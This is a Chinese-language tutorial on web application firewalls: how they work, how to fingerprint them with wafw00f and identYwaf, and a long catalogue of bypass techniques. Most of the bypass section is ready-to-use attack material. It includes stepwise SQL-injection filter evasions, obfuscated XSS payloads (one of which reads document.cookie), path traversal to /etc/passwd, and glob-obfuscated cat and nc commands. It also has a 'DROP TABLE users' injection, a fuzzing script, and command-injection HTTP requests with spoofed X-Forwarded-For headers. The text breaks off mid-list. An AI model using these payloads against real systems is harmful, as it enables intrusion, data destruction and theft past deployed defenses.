waf从入门到Bypass

Web应用程序防火墙是位于Web应用程序与客户端端点之间的安全策略实施点。该功能可以用软件或硬件,在设备设备中运行或在运行通用操作系统的典型服务器中实现。它可以是独立设备,也可以集成到其他网络组件中。 对于WAF,你了解多少?需要这篇文章能对你有所帮助!

介绍

WAF如何工作:

  • 使用一组规则来区分正常请求和恶意请求。
  • 学习模式通过了解用户行为自动添加规则 。

WAF如何防御:

  • 负面模型(基于黑名单)-黑名单模型使用预设的签名来阻止显然是恶意的Web流量,并使用签名来防止利用某些网站和Web应用程序漏洞的攻击。 将模型Web应用程序防火墙列入黑名单是公共互联网上的网站和Web应用程序的绝佳选择,并且对主要的DDoS攻击类型非常有效。 例如。 阻止所有 输入的规则。
  • 肯定模型(基于白名单)-白名单模型仅允许根据特定配置的标准进行网络访问。 例如,可以将其配置为仅允许来自某些IP地址的HTTP GET请求。 该模型对于阻止可能的网络攻击可能非常有效,但是白名单将阻止大量合法流量。 将模型列入白名单的防火墙可能最适合内部网络上的Web应用程序,该网络应用程序设计为仅由有限的一组人员(例如员工)使用。
  • 混合/混合模型(包含模型)-混合安全模型是一种混合了白名单和黑名单的模型。 根据各种具体的配置细节,混合防火墙可能是内部网络上的Web应用程序和公用Internet上的Web应用程序的最佳选择

如何识别WAF

识别waf技术

  • 一些WAF在请求中设置自己的cookie(例如Citrix,Netscaler,Yunsuo WAF,safedog)
  • 有些人将自己与单独的标头关联(例如Anquanbao WAF,AmazonAWSWAF)。
  • 有些经常更改标头和混乱的字符以使攻击者感到困惑(例如Netscaler,Big-IP)。
  • 有些人在服务器头数据包中暴露自己(eg. Approach, WTS WAF)
  • 一些WAF在响应内容body中公开自身(例如DotDefender,Armor,Sitelock)
  • 其他WAF会对恶意请求做出不寻常的响应代码答复(例如WebKnight,360WAF
  • 有些WAF会返回一堆垃圾数据,卡死你(例如:百度云加速乐)

检测技术:

  1. 从浏览器发出普通的GET请求,拦截并记录响应头(特别是cookie)。
  2. 从命令行(例如cURL)发出请求,并测试响应内容和标头(不包括user-agent)。
  3. 向随机开放的端口发出GET请求,并抓住可能暴露WAF身份的标语。
  4. 如果某处有登录页面,表单页面等.请尝试一些常见的(易于检测的)有效负载,例如 " or 1=1 -- -
  5. 将../../../etc/passwd附加到URL末尾的随机参数
  6. 在url的末尾添加一些吸引人的关键字,如'or sleep(5)'
  7. 使用过时的协议(如http/0.9)发出get请求(http/0.9不支持post类型查询)。
  8. 很多时候,waf根据不同的交互类型改变服务器头。
  9. 删除操作技术-发送一个原始的fin/rst包到服务器并识别响应。
  10. 侧通道攻击-检查请求和响应内容的计时行为。

主流WAF指纹识别:

根据一些waf检测特性,我们可以一些小技巧,对WAF进行识别

识别工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ wafw00f -l

______
/ \
( Woof! )
\______/ )
,, ) (_
.-. - _______ ( |__|
()``; |==|_______) .)|__|
/ (' /|\ ( |__|
( / ) / | \ . |__|
\(_)_)) / | \ |__|

WAFW00F - Web Application Firewall Detection Tool

Can test for these WAFs:

aeSecure (aeSecure)
Airlock (Phion/Ergon)
ASP.NET Generic Protection (Microsoft)
Astra Web Protection (Czar Securities)
AWS Elastic Load Balancer (Amazon)
Yunjiasu (Baidu Cloud Computing)
Barikode (Ethic Ninja)
Barracuda Application Firewall (Barracuda Networks)
Bekchy (Faydata Technologies Inc.)
BinarySec (BinarySec)
BitNinja (BitNinja)
BlockDoS (BlockDoS)
Bluedon (Bluedon IST)
CacheWall (Varnish)
CdnNS Application Gateway (CdnNs/WdidcNet)
WP Cerber Security (Cerber Tech)
ChinaCache CDN Load Balancer (ChinaCache)
Chuang Yu Shield (Yunaq)
ACE XML Gateway (Cisco)
Cloudbric (Penta Security)
Greywizard (Grey Wizard)
HyperGuard (Art of Defense)
.....
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ python identYwaf.py
__ __
____ ___ ___ ____ ______ | T T __ __ ____ _____
l j| \ / _]| \ | T| | || T__T T / T| __|
| T | \ / [_ | _ Yl_j l_j| ~ || | | |Y o || l_
| | | D YY _]| | | | | |___ || | | || || _|
j l | || [_ | | | | | | ! \ / | | || ]
|____jl_____jl_____jl__j__j l__j l____/ \_/\_/ l__j__jl__j (1.0.XX)

Usage: python identYwaf.py [options] <host|url>

Options:
--version Show program's version number and exit
-h, --help Show this help message and exit
--delay=DELAY Delay (sec) between tests (default: 0)
--timeout=TIMEOUT Response timeout (sec) (default: 10)
--proxy=PROXY HTTP proxy address (e.g. "http://127.0.0.1:8080")
--proxy-file=PRO.. Load (rotating) HTTP(s) proxy list from a file
--random-agent Use random HTTP User-Agent header value
--code=CODE Expected HTTP code in rejected responses
--string=STRING Expected string in rejected responses
--post Use POST body for sending payloads

WAF绕过技巧

Fuzzing绕过

测试受阻

在对waf测试过程中,下面这段请求被WAF拦截

1
2
3
4
5
6
7
8
9
GET /get/index.jsp?id=payload HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1

选择Fuzzing字典

脚本编写

1
2
3
4
5
6
7
8
9
10
11
12
13
def fuzzing(payload):
payloads = []
special_chars = ['\r', '\n', '\t', '_', '~', '&', '-', '=', '/', '*','^', '$', ',', '.', '/', '<', '>', '|', '/**/', '--','\r\n', '||']
#special_chars 字典在步骤2中选择合适的
for char in special_chars:
for k in range(len(payload)):
try:
temp_payload = payload[:k] + char + payload[k:]
payloads.append(temp_payload)
except Exception as e:
print(e)

return payloads

SQL注入

Step 1

过滤关键词:and, or, union 可能正则: preg_match('/(and|or|union)/i', $id)

1
2
- Blocked: union select user, password from users
- Bypass: 1 || (select user from users where user_id = 1) = 'admin'

Step 2

过滤关键词: and, or, union, where

1
2
- Blocked: 1 || (select user from users where user_id = 1) = 'admin'
- Bypass: 1 || (select user from users limit 1) = 'admin'

Step 3

过滤关键词: and, or, union, where , limit

1
2
- Blocked: 1 || (select user from users limit 1) = 'admin'
- Bypass: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

Step 4

过滤关键词: and, or, union, where ,limit , group by, select

1
2
- Blocked: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

Step 5

过滤关键词: and, or, union, where ,limit , group by , select

1
2
3
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || 1 = 1 into outfile 'result.txt'
- Bypass: 1 || substr(user,1,1) = 'a'

Step 6

过滤关键词: and, or, union, where ,limit , group by , select , '

1
2
3
4
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || user_id is not null
- Bypass: 1 || substr(user,1,1) = 0x61
- Bypass: 1 || substr(user,1,1) = unhex(61)

Step 7

过滤关键词: and, or, union, where ,limit , group by , select,',hex

1
2
- Blocked: 1 || substr(user,1,1) = unhex(61)
- Bypass: 1 || substr(user,1,1) = lower(conv(11,10,36))

Step 8

过滤关键词: and, or, union, where ,limit , group by , select,',hex , substr

1
2
- Blocked: 1 || substr(user,1,1) = lower(conv(11,10,36))
- Bypass: 1 || lpad(user,7,1)

Step 9

过滤关键词: and, or, union, where ,limit , group by , select,',hex , substr ,white space

1
2
- Blocked: 1 || lpad(user,7,1)
- Bypass: 1%0b||%0blpad(user,7,1)

混淆

大小写切换

  • 一些开发不完善的WAF会选择性过滤特定案例的WAF。.
  • 我们可以结合使用大小写字符来开发有效的有效载荷.
1
2
3
4
Standard: <script>alert()</script>
Bypassed: <ScRipT>alert()</sCRipT>
Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

url编码

  • 使用%编码/ URL编码对普通有效载荷进行编码。
  • 在线工具
  • Burp包含一个内置编码器/解码器
1
2
3
4
Blocked: <svG/x=">"/oNloaD=confirm()//
Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
Blocked: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

Unicode规范化

  • unicode编码编码的ASCII字符为绕过提供了很大的Bapass
  • 您可以对整个/部分有效载荷进行编码以获得结果
1
2
3
4
5
6
7
8
Standard: <marquee onstart=prompt()>
Obfuscated: <marquee onstart=\u0070r\u06f\u006dpt()>
Blocked: /?redir=http://google.com
Bypassed: /?redir=http://google。com (Unicode替代)
Blocked: <marquee loop=1 onfinish=alert()>x
Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode替代)
Standard: ../../etc/passwd
Obfuscated: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd

HTML Representation

  • 通常,网络应用会将特殊字符编码为HTML编码,并相应地进行渲染.
1
2
3
Standard: "><img src=x onerror=confirm()>
Encoded: &quot;><img src=x onerror=confirm&lpar;&rpar;> (一般形式)
Encoded: &#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62; (html编码)

混合编码

  • 有时,WAF规则通常倾向于滤除特定类型的编码.
  • 混合编码有效载荷可以绕过这种类型的过滤器.
  • 制表符和换行符进一步增加了混淆.

Obfuscated:

1
2
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

使用注释

  • 注释混淆标准有效载荷向量.
  • 不同的有效载荷具有不同的混淆方式.
1
2
3
4
Blocked: <script>alert()</script>
Bypassed: <!--><script>alert/**/()/**/</script>
Blocked: /?id=1+union+select+1,2,3--
Bypassed: /?id=1+un/**/ion+sel/**/ect+1,2,3--

双重编码

  • 通常,WAF过滤器倾向于对字符进行编码以防止攻击.
  • 但是,开发不完善的过滤器(没有递归过滤器)可以使用双重编码来绕过.
1
2
3
4
Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
Standard: <script>alert()</script>
Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E

通配混淆

  • 各种命令行实用程序都使用通配符模式来处理多个文件.
  • 我们可以调整它们以执行系统命令.
  • 特定于linux系统上的远程执行代码漏洞.
1
2
3
4
5
6
Standard: /bin/cat /etc/passwd
Obfuscated: /???/??t /???/??ss??
Used chars: / ? t s
Standard: /bin/nc 127.0.0.1 1337
Obfuscated: /???/n? 2130706433 1337
Used chars: / ? n [0-9]

动态有效载荷生成

  • 不同的编程语言具有不同的连接语法和模式.
  • 这使我们能够有效地生成可以绕过许多过滤器和规则的有效载荷.
1
2
3
4
5
6
Standard: <script>alert()</script>
Obfuscated: <script>eval('al'+'er'+'t()')</script>
Standard: /bin/cat /etc/passwd
Obfuscated: /bi'n'''/c''at' /e'tc'/pa''ss'wd
Standard: <iframe/onload='this["src"]="javascript:alert()"';>
Obfuscated: <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>

根据这个思路,我们可以继续向其延申

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<svg/onload=self[`al`+`ert`]`1`>
<svg/onload=window[`al`+`ert`]`1`>
<svg/onload=parent[`al`+`ert`]`1`>
<svg/onload=self[`al`+`ert`]`1`>
<svg/onload=top[`al`+`ert`]`1`>
<svg/onload=frames[`al`+`ert`]`1`>
<svg/onload=self.frames[`al`+`ert`]`1`>
<svg/onload=self.top[`al`+`ert`]`1`>
<svg/onload=self.self[`al`+`ert`]`1`>
<svg/onload=self.parent[`al`+`ert`]`1`>
<svg/onload=self.window[`al`+`ert`]`1`>
<svg/onload=top[`al`+`ert`](`docu`+`ment.cookie`)>
<svg/onload=self[`aler`+`t`]`1`>
<svg/onload=self[`al`+`ert`]`1`>
<svg/onload=self[`al`%2b`ert`]`1`>

垃圾字符

  • 正常的有效载荷很容易被过滤掉.
  • 添加一些垃圾字符有助于避免检测(仅限特定情况).
  • 它们通常有助于混淆基于正则表达式的防火墙.
1
2
3
4
Standard: <script>alert()</script>
Obfuscated: <script>+-+-1-+-+alert(1)</script>
Standard: <BODY onload=alert()>
Obfuscated: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^=alert()>`

NOTE: 上面的有效负载可能会破坏正则表达式解析器,从而导致异常.

1
2
Standard: <a href=javascript;alert()>ClickMe
Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

换行符

  • 许多具有基于正则表达式的WAF可以有效地阻止许多尝试.
  • 换行符(CR / LF)可以破坏防火墙的正则表达式并绕过某些东西.
1
2
Standard: <iframe src=javascript:confirm(0)">
Obfuscated: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">

未初始化的变量

  • 初始化的bash变量可以规避基于正则表达式的错误过滤器和模式匹配.
  • 它们的值等于null /它们的作用类似于空字符串.
  • bash和perl都允许这种解释.
  • 变量名称可以具有任意数量的随机字符。我在这里将它们表示为$ aaaaaa,$ bbbbbb等。您可以将它们替换为任意数量的随机字符,例如$ ushdjah等 .
1
2
3
4
5
6
7
8
9
- Level 1 混淆: Normal
Standard: /bin/cat /etc/passwd
Obfuscated: /bin/cat$u /etc/passwd$u
- Level 2 混淆: Postion Based
Standard: /bin/cat /etc/passwd
Obfuscated: $u**/bin**$u**/cat**$u $u**/etc**$u**/passwd**$u
- Level 3 混淆: Random characters
Standard: /bin/cat /etc/passwd
Obfuscated: $aaaaaa**/bin**$bbbbbb**/cat**$ccccccc $dddddd**/etc**$eeeeeee**/passwd**$fffffff

精心制作的payload:

1
$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf

制表符和换行符

  • 选项卡通常有助于规避防火墙,尤其是基于正则表达式的防火墙.
  • 当正则表达式需要空格而不是制表符时,制表符可以帮助打破防火墙正则表达式.
1
2
3
4
5
6
7
Standard: <IMG SRC="javascript:alert();">
Bypassed: <IMG SRC=" javascript:alert();">
Variant: <IMG SRC=" jav ascri pt:alert ();">
Standard: http://test.com/test?id=1 union select 1,2,3
Standard: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
Standard: <iframe src=javascript:alert(1)></iframe>
Obfuscated:<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

令牌破坏者

  • 对令牌生成器的攻击试图打破在令牌破坏者的帮助下将请求拆分为令牌的逻辑.
  • 令牌破译器是允许影响字符串元素和某个令牌之间的对应关系的符号,从而绕过通过签名进行搜索.
  • 但是,在使用令牌断开器时,请求必须仍然有效.
1
2
3
4
5
- Case: Unknown Token for the Tokenizer
- Payload: ?id='-sqlite_version() UNION SELECT password FROM users --
- Case: Unknown Context for the Parser (Notice the uncontexted bracket)
- Payload 1: ?id=123);DROP TABLE users --
- Payload 2: ?id=1337) INTO OUTFILE 'xxx' --

burpsuit插件

https://github.com/codewatchorg/bypasswaf

X-Originating-IP

用户可以修改在每个请求中发送的X-Originating-IP,X-Forwarded-For,X-Remote-IP,X-Remote-Addr头。 这可能是顶部绕过技术的工具。 将WAF配置为信任自己(127.0.0.1)或上游代理设备是常见的,这是此绕过目标。

原始请求 插件改变后
X-Originating-IP:原始IP X-Originating-IP:127.0.0.1
X-Forwarded-For:原始IP X-Forwarded-For:127.0.0.1
X-Remote-IP:原始IP X-Remote-IP:127.0.0.1
X-Remote-Addr:原始IP X-Remote-Addr:127.0.0.1

案例X-Originating-IP > 127.0.0.1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GET /get/?id=;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For:127.0.0.2
Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1

Content-type

“Content-Type”头部在每个请求中可以保持不变,从所有请求中删除,或者修改为每个请求的许多其他选项之一。 一些WAF将仅仅基于已知内容类型来解码/评估请求,这个特征针对该弱点。

原始请求 结果
Content-Type:原始 Content-Type:原始
Content-Type:原始 删除Content-Type
Content-Type:原始 Content-Type: invalid
Content-Type:原始 Content-Type: example
Content-Type:原始 Content-Type: multipart/
Content-Type:原始 Content-Type: multipart/digest
Content-Type:原始 Content-Type: multipart/digest; boundary=0000
Content-Type:原始 Content-Type: multipart/; boundary=0000

案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /post_key/main.jsp HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Typeapplication/x-www-form-urlencoded
Referer: http://10.100.12.249:8080/post_key/
Content-Length: 30
Connection: close
Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Type: multipart/; boundary=0000

name=%3Bnetstat+-ant+&pass=1

Host

也可以修改“主机”标题。 配置不当的WAF可能配置为仅根据此标头中找到的主机的正确FQDN来评估请求,这是此绕过目标。

案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /post_key/main.jsp HTTP/1.1
Host: 改变这里
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Typeapplication/x-www-form-urlencoded
Referer: http://10.100.12.249:8080/post_key/
Content-Length: 30
Connection: close
Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Type: multipart/; boundary=0000

name=%3Bnetstat+-ant+&pass=1

Pathinfo

路径注入功能可以不修改请求,注入随机路径信息(/path/to/example.php/randomvalue?restofquery),或注入随机路径参数(/path/to/example.php;randomparam=randomvalue? resetofquery)。 这可以用于绕过依赖于路径信息的编写不良的规则。

  • 原始请求

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • Pathinfoinjection

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get//fhwa84a04vq8a0jnefo?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathParametwesinjection

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/;mhz=cpv?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
    1
    2


PathObfuscation

路径混淆功能将路径中的最后一个正斜杠修改为随机值,或者默认情况下不做任何操作。 最后一个斜杠可以修改为许多值中的一个,在许多情况下导致仍然有效的请求,但是可以绕过依赖于路径信息的写得不好的WAF规则。

  • 原始请求

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathObfuscation_//

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get///////?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathObfuscation_/./

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/././?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathObfuscation_/random/./

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/co7t/../co7t/../?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathObfuscation_\

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET \get\?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathObfuscation_/.//

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/.//.//?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathObfuscation_/./\

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/././\\?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • PathObfuscation_/.\

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/.\.\?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • ParamObfuscation

  • 原始请求

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • ParamObfuscation_+

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?+id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • ParamObfuscation_%

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?%id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
    Upgrade-Insecure-Requests: 1
  • ParamObfuscation_%20

    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /get/?%20id=;netstat%20-ant HTTP/1.1
    Host: 10.100.12.249:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
